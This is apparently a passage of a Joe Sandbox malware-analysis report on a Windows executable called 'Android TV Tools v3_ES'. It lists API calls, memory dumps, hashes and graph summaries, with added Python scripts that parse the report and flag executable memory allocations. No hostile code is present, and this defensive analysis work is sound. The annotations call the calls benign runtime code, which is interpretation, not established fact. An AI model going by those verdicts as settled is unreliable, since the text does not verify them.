                        • GetLastError.KERNEL32 ref: 00407B96
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ErrorFileLastRead
                        • String ID:
                        • API String ID: 1948546556-0
                        • Opcode ID: 0d5067df5a756ab654c47183697cafa53bf190f3cee5e65e26fac1f14512f9f4
                        • Instruction ID: 3c71f4a4c914093daa4e111219e29098325ab7dc149a3d367288bca257ac33ee
                        • Opcode Fuzzy Hash: 0d5067df5a756ab654c47183697cafa53bf190f3cee5e65e26fac1f14512f9f4
                        • Instruction Fuzzy Hash: FD619F30E0C2899FDB118F58C844BAA7BB0BB12308F1444ABE451AB3D1D379B946CB5B

                        Control-flow Graph (drawn as an image on the original page; summarised here from its node and edge dump)

                        • Entry block 407767-40777c, 33 basic blocks, common exit block 40790f-407913
                        • API call sites: 407822-407847 WriteFile, 40788c-407895 GetLastError, 407897-4078ac WriteFile, 4078b9-4078c2 GetLastError
                        • Internal calls: 4077bc-4077c5 call 407522, 4078c4-4078cd call 409272
                        APIs
                        • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0040783F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: aff254ac8d8d06b1c375933265a01826a9e1b8ea15b91dc9473dc59729e29b07
                        • Instruction ID: c19b3d791ab711fa8c5ef569e7948fa19eb36375cf462a63fb87303f5cca5c05
                        • Opcode Fuzzy Hash: aff254ac8d8d06b1c375933265a01826a9e1b8ea15b91dc9473dc59729e29b07
                        • Instruction Fuzzy Hash: 9251E571D04208EFDB11DF68C888ADE7BB0FB41340F2085BAE815AB2D0D334EA44CB5A

                        Control-flow Graph (drawn as an image on the original page; summarised here from its node and edge dump)

                        • Entry block 409eb2-409ec3, 9 basic blocks, common exit block 409f60-409f62
                        • API call sites: 409ec5-409ee2 HeapReAlloc, 409ef5-409f19 HeapAlloc, 409f1b-409f33 VirtualAlloc, 409f35-409f3f HeapFree
                        • Edges of note: the HeapFree block is entered only from the VirtualAlloc block and rejoins the common return path 409f45-409f47; the other VirtualAlloc successor, 409f49-409f5e, goes straight to the exit block
                        APIs (argument reading: VirtualAlloc(00000000, 00100000, 00002000, 00000004) is a 1 MB MEM_RESERVE | PAGE_READWRITE request, i.e. address space reserved but neither committed nor executable, and the graph reaches HeapFree only from the VirtualAlloc block, so the 0x41C4-byte header obtained from HeapAlloc is released when the reservation fails. This is allocator bookkeeping consistent with the MSVC CRT small-block heap region allocator, not staging of unpacked code)
                        • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00409C7A,?,?,?,00000100), ref: 00409EDA
                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F0E
                        • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F28
                        • HeapFree.KERNEL32(00000000,?,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AllocHeap$FreeVirtual
                        • String ID:
                        • API String ID: 3499195154-0
                        • Opcode ID: 0d56ca5cad879738d64fea35e25317797a88da85582025049e091cafbee42b77
                        • Instruction ID: 16a10c85fc288a3fd0697e0b5d36225c66a208a9a462dcf54f8a75511906bb86
                        • Opcode Fuzzy Hash: 0d56ca5cad879738d64fea35e25317797a88da85582025049e091cafbee42b77
                        • Instruction Fuzzy Hash: 1E115E30201209DFC720DF99ED45E22BBB6FB84724B10492AF256E75F1D7709846EF04
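The "APIs" lines in these entries (the ReadFile, WriteFile, HeapCreate and VirtualAlloc listings above) are a stack snapshot at each call site: eight-digit hex words, "?" where the analyser could not recover a value, and string literals where it could. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses such lines and decodes the VirtualAlloc allocation type and page protection, so that a reserve-only, read-write request like the one in this entry can be told apart from an executable allocation worth a closer look. The sample lines are copied from this page; the image address range is an assumption taken from the dump list under "Memory Dump Source", and the caveat about argument positions is the editor's own.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and decode the Win32
constants that matter for triage. Added example for this page, not report tooling."""
import re
from dataclasses import dataclass, field
from typing import Optional, Union

# Constructed sample input: API reference lines copied from the entries on this page.
SAMPLE_LINES = """
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 00407ABB
• GetLastError.KERNEL32 ref: 00407AC5
• WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0040783F
• VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F28
• HeapCreate.KERNELBASE(00000000,00001000,00000000,004064A2,00000000), ref: 0040894D
  • Part of subcall function 00409815: HeapAlloc.KERNEL32(00000000,00000140,00408961), ref: 00409822
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00408CA5,?,Microsoft Visual C++ Runtime Library,00012010,?,0040D484,?,0040D4D4,?,?,?,Runtime Error!Program: ), ref: 0040B653
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# VirtualAlloc flAllocationType bits and flProtect values, from winnt.h.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
             0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
# Assumption: the sample image spans the dumps listed under "Memory Dump Source"
# (base 0x400000; upper bound taken from the highest listed section dump, 0x415000).
IMAGE_RANGE = (0x400000, 0x416000)

Arg = Union[int, str, None]

@dataclass
class ApiRef:
    name: str
    module: str
    ref: int                      # address of the call instruction
    args: list                    # int, str literal, or None for '?' (not recoverable)
    subcall_of: Optional[int] = None
    notes: list = field(default_factory=list)

def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token                  # string literal such as "user32.dll"

def decode_alloc_type(value: int) -> str:
    names = [n for bit, n in MEM_FLAGS.items() if value & bit]
    leftover = value & ~sum(MEM_FLAGS)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"

def decode_protect(value: int) -> str:
    names = [PAGE_BASE.get(value & 0xFF, hex(value & 0xFF))]
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)

def is_executable_alloc(ref: ApiRef) -> bool:
    """True when a VirtualAlloc asks for an executable page protection."""
    if ref.name != "VirtualAlloc" or len(ref.args) < 4 or not isinstance(ref.args[3], int):
        return False
    return (ref.args[3] & 0xFF) in EXECUTABLE

def annotate(ref: ApiRef) -> ApiRef:
    if ref.name == "VirtualAlloc" and len(ref.args) >= 4 and all(isinstance(a, int) for a in ref.args[:4]):
        _, size, alloc_type, protect = ref.args[:4]
        ref.notes.append(f"size={size:#x} type={decode_alloc_type(alloc_type)} "
                         f"protect={decode_protect(protect)}")
    for i, a in enumerate(ref.args):
        if isinstance(a, int) and IMAGE_RANGE[0] <= a < IMAGE_RANGE[1]:
            ref.notes.append(f"arg{i}={a:#x} lies inside the sample image "
                             "(a return address or a pointer to sample data)")
    return ref

def parse_report(text: str) -> list:
    """One ApiRef per 'Name.Module(args), ref: addr' line; other lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Caveat: the listing is a stack snapshot, usually longer than the API's parameter
        # list, and pushes the analyser could not recover may be dropped, so positions are
        # reliable only where the leading values match the prototype (as for VirtualAlloc).
        # Naive comma split: no string literal in this report contains a comma.
        args = [_parse_arg(t) for t in raw.split(",")] if raw is not None else []
        sub = m.group("sub")
        refs.append(annotate(ApiRef(m.group("name"), m.group("module"), int(m.group("ref"), 16),
                                    args, int(sub, 16) if sub else None)))
    return refs

if __name__ == "__main__":
    for r in parse_report(SAMPLE_LINES):
        flag = "  [EXECUTABLE ALLOCATION]" if is_executable_alloc(r) else ""
        print(f"{r.ref:#010x} {r.module}!{r.name}{flag}")
        for note in r.notes:
            print("    ", note)
```

Run against this page's VirtualAlloc line it reports a 1 MB MEM_RESERVE, PAGE_READWRITE request with no executable bit, while a constructed 0x3000 / 0x40 request (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) is flagged; the same decoding applies to any Joe Sandbox "APIs" block.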

                        Control-flow Graph (drawn as an image on the original page; summarised here from its node and edge dump)

                        • Entry block 407337-407345, 15 basic blocks, common exit block 4073e5-4073e9
                        • API call sites: 407394-4073a4 FindCloseChangeNotification (preceded in the same block by call 40a4da), 4073a6-4073ae GetLastError (entered only from that block)
                        • Internal calls: 407368-407372 call 40a4da, 40737e-407392 call 40a4da * 2, 4073b2-4073c2 call 40a460, 4073c4-4073cb call 409272
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000100,00000000,?,00000000,0040AA21,00000000), ref: 0040739C
                          (label caveat: in KernelBase.dll the FindCloseChangeNotification export resolves to the same address as CloseHandle, so the disassembler's choice of name is arbitrary; a handle-close routine that checks GetLastError immediately afterwards, as this one does, is almost certainly calling CloseHandle)
                        • GetLastError.KERNEL32(?,00000000,0040AA21,00000000), ref: 004073A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification
                        • String ID:
                        • API String ID: 1687624791-0
                        • Opcode ID: f1965d678b67d3615b11a71d6e08b8914040d033c00d52028fdbc15ec9fa0c97
                        • Instruction ID: b84c0215f91ab881d8f446bb9404d36fe1e38b0d3790a2a0251880d5805ce127
                        • Opcode Fuzzy Hash: f1965d678b67d3615b11a71d6e08b8914040d033c00d52028fdbc15ec9fa0c97
                        • Instruction Fuzzy Hash: 41113A32E083089BF6105765AD49B2B3358AB42769F11457FEC04B62D2DBFCF844E11B
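The control-flow graphs in these entries are drawn as images, but the page source carries each one as a flat token dump of the form "control_flow_graph <id> <start-end> [labels] <a>-><b> …", where labels are API names or "call <addr> [* <n>]". The script below is an added example, not Joe Sandbox code. It rebuilds such a dump into blocks and edges and answers the question a reader of the allocator entry above would ask of the picture: which blocks lie on every path to HeapFree? The two dumps embedded in it are copied from this page (the second is an excerpt of the function 407337 graph); the rule that address ranges have five to eight hex digits while node ids have fewer is an assumption made to disambiguate the token stream.

```python
"""Rebuild a Joe Sandbox control-flow graph from its textual token dump.
Added example for this page; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed input: the dump of the heap-region allocator above (function 409eb2), verbatim.
SAMPLE_GRAPH = (
    "control_flow_graph 1387 409eb2-409ec3 1388 409ef5-409f19 HeapAlloc 1387->1388 "
    "1389 409ec5-409ee2 HeapReAlloc 1387->1389 1391 409f45-409f47 1388->1391 "
    "1392 409f1b-409f33 VirtualAlloc 1388->1392 1390 409ee4-409ef0 1389->1390 1389->1391 "
    "1390->1388 1393 409f60-409f62 1391->1393 1394 409f35-409f3f HeapFree 1392->1394 "
    "1395 409f49-409f5e 1392->1395 1394->1391 1395->1393")
# Constructed excerpt of the function 407337 dump, to exercise "call <addr> * <n>" labels.
SAMPLE_CALLS = (
    "control_flow_graph 1471 407374-407377 1473 40737e-407392 call 40a4da * 2 1471->1473 "
    "1475 407394-4073a4 call 40a4da FindCloseChangeNotification 1473->1475")

# Assumption: block address ranges have 5..8 hex digits and node ids fewer; that is what
# keeps a decimal label such as the "2" of "* 2" from being taken for a node id.
RANGE_RE = re.compile(r"^([0-9a-fA-F]{5,8})(?:-([0-9a-fA-F]{5,8}))?$")

@dataclass
class Block:
    node_id: int
    start: int
    end: int
    labels: list = field(default_factory=list)  # API names, "call", targets, "*", counts

@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)
    edges: list = field(default_factory=list)

    def successors(self, nid):
        return sorted(b for a, b in self.edges if a == nid)

    def predecessors(self, nid):
        return sorted(a for a, b in self.edges if b == nid)

    def entry(self):
        roots = [n for n in self.blocks if not self.predecessors(n)]
        return min(roots, key=lambda n: self.blocks[n].start)

    def exits(self):
        return sorted(n for n in self.blocks if not self.successors(n))

def parse_cfg(dump: str) -> Cfg:
    toks = dump.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    cfg, cur, i = Cfg(), None, 1
    while i < len(toks):
        t = toks[i]
        if "->" in t:                                     # edge a->b
            a, b = t.split("->")
            cfg.edges.append((int(a), int(b)))
            i += 1
        elif t.isdigit() and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            m = RANGE_RE.match(toks[i + 1])               # node id followed by start[-end]
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start
            cur = Block(int(t), start, end)
            cfg.blocks[cur.node_id] = cur
            i += 2
        else:                                             # label of the most recent block
            if cur is None:
                raise ValueError(f"label {t!r} before any block")
            cur.labels.append(t)
            i += 1
    return cfg

def blocks_calling(cfg: Cfg, api: str) -> list:
    return sorted(n for n, b in cfg.blocks.items() if api in b.labels)

def internal_calls(block: Block) -> list:
    """(target address, call count) for each 'call <addr> [* <n>]' label group."""
    out, lab = [], block.labels
    for i, t in enumerate(lab):
        if t == "call" and i + 1 < len(lab):
            n = int(lab[i + 3]) if i + 3 < len(lab) and lab[i + 2] == "*" else 1
            out.append((int(lab[i + 1], 16), n))
    return out

def all_paths(cfg: Cfg, src: int, dst: int) -> list:
    """Every simple path from src to dst (DFS; loops are cut by the on-path check)."""
    paths, stack = [], [(src, [src])]
    while stack:
        node, path = stack.pop()
        if node == dst:
            paths.append(path)
            continue
        for nxt in reversed(cfg.successors(node)):
            if nxt not in path:
                stack.append((nxt, path + [nxt]))
    return paths

def apis_on_path(cfg: Cfg, path: list) -> list:
    """API names (capitalised labels) met along a path, in order."""
    return [l for n in path for l in cfg.blocks[n].labels if l[:1].isalpha() and l[:1].isupper()]

if __name__ == "__main__":
    cfg = parse_cfg(SAMPLE_GRAPH)
    print(f"entry {cfg.entry()}, exits {cfg.exits()}, {len(cfg.blocks)} blocks, {len(cfg.edges)} edges")
    for p in all_paths(cfg, cfg.entry(), blocks_calling(cfg, "HeapFree")[0]):
        print(" -> ".join(f"{cfg.blocks[n].start:x}" for n in p), apis_on_path(cfg, p))
```

For the allocator graph this yields two paths from the entry to the HeapFree block, both passing through the VirtualAlloc block, which is the textual form of the observation that the header is freed only after VirtualAlloc has been tried.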
                        APIs
                        • SetFilePointer.KERNELBASE(00000000,004077C5,00000000,?,00000000,?,?,004077C5,?,00000000,00000002,00000001,?,?), ref: 00407571
                        • GetLastError.KERNEL32 ref: 0040757E
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer
                        • String ID:
                        • API String ID: 2976181284-0
                        • Opcode ID: d79cffe0eace2165adb95f6e1714898f50e239d9efe542db10b5d1d8fd5a1575
                        • Instruction ID: 43fb3ff8955d71c7df25f22854cb706fbbd21b76865ed93209a7189df02148de
                        • Opcode Fuzzy Hash: d79cffe0eace2165adb95f6e1714898f50e239d9efe542db10b5d1d8fd5a1575
                        • Instruction Fuzzy Hash: 61110831D08701ABC700CBB8DD48A9537A4AB41379F204B7EF525E76D2E7B8E945D70A
                        APIs (HeapCreate(flOptions=00000000, dwInitialSize=00001000, dwMaximumSize=00000000) creates a growable private heap, and HeapDestroy tears it down again when the subcall's HeapAlloc fails: this is the MSVC CRT's heap initialisation, not sample-specific behaviour)
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,004064A2,00000000), ref: 0040894D
                          • Part of subcall function 00409815: HeapAlloc.KERNEL32(00000000,00000140,00408961), ref: 00409822
                        • HeapDestroy.KERNEL32 ref: 0040896B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Heap$AllocCreateDestroy
                        • String ID:
                        • API String ID: 2236781399-0
                        • Opcode ID: e8bba990ccffa2263e0e2a483a6bb437c4793ec73d8d994b3a1b54e875279d9f
                        • Instruction ID: 2aac7c1394e53d3f3e241b4ce236eb09025fc4cfcb4860e37ea7bfaf2a03933a
                        • Opcode Fuzzy Hash: e8bba990ccffa2263e0e2a483a6bb437c4793ec73d8d994b3a1b54e875279d9f
                        • Instruction Fuzzy Hash: 76E05B757553019BEB102B709E49B7635D5BB8478AF00443AF988D81E5EB74C444A505
                        APIs
                        • GetFileAttributesA.KERNELBASE(0040E414,004067CD,?,00000000,00000000,0040E414,?,?,?,0040D108,0040D108), ref: 0040686D
                        • GetLastError.KERNEL32(?,?,?,0040D108,0040D108), ref: 00406878
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AttributesErrorFileLast
                        • String ID:
                        • API String ID: 1799206407-0
                        • Opcode ID: cc82ef407f6d86054e7289c396e8563b88531115bb3fcb10dbfc04f215eba6d2
                        • Instruction ID: 190a03a2e6e8e0156cf8b8d81b12f4a57a4c620664e03452b76d7cf4d8f2981d
                        • Opcode Fuzzy Hash: cc82ef407f6d86054e7289c396e8563b88531115bb3fcb10dbfc04f215eba6d2
                        • Instruction Fuzzy Hash: 9BE08631406700D9DF0427749D0C75B3A606F8136DF55CB7AE866A01F0C77D88559609
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,?,00408DCA,000000E0,00408DB7,?,004075CD,00000100), ref: 00408E14
                          (kernel32!HeapAlloc is a forwarder to ntdll!RtlAllocateHeap, so the ntdll name here is how the import resolved at run time, not evidence that the sample calls ntdll directly)
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 3204e1776a58b5f8538dd2b3008e8bd4b1f4afee07a9b8d4f3e541a377c3b46d
                        • Instruction ID: 87bc941ac8621733d738759247a0ee1dbd76439509efa145d36000547ea8371e
                        • Opcode Fuzzy Hash: 3204e1776a58b5f8538dd2b3008e8bd4b1f4afee07a9b8d4f3e541a377c3b46d
                        • Instruction Fuzzy Hash: 61E0C232802131A7DA206614BE007DB3724BF10370F060136FC84BB2E19B342C5155CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                        • API String ID: 0-1157002505
                        • Opcode ID: 91c198814475ad20b00baa46edb7cd0f32e5d43a7861d63c3a379bfb68159c14
                        • Instruction ID: 2579d61e5318648577aea87276846eeb8dacae63ee80e8af8a22806d5028b4ca
                        • Opcode Fuzzy Hash: 91c198814475ad20b00baa46edb7cd0f32e5d43a7861d63c3a379bfb68159c14
                        • Instruction Fuzzy Hash: ADE1F131D55219DEEB248FA4C9957BE7BB1BB00300F28467BD401B62C2D37C9982DB5E
                        APIs (this run-time resolution of MessageBoxA, GetActiveWindow and GetLastActivePopup from user32.dll, with the "Microsoft Visual C++ Runtime Library" banner visible in the call context, is the MSVC CRT's __crtMessageBoxA helper: compiler runtime code, and the kind of LoadLibrary/GetProcAddress pattern behind the "dynamically determine API calls" signature, not sample-specific import hiding)
                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00408CA5,?,Microsoft Visual C++ Runtime Library,00012010,?,0040D484,?,0040D4D4,?,?,?,Runtime Error!Program: ), ref: 0040B653
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040B66B
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040B67C
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040B689
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
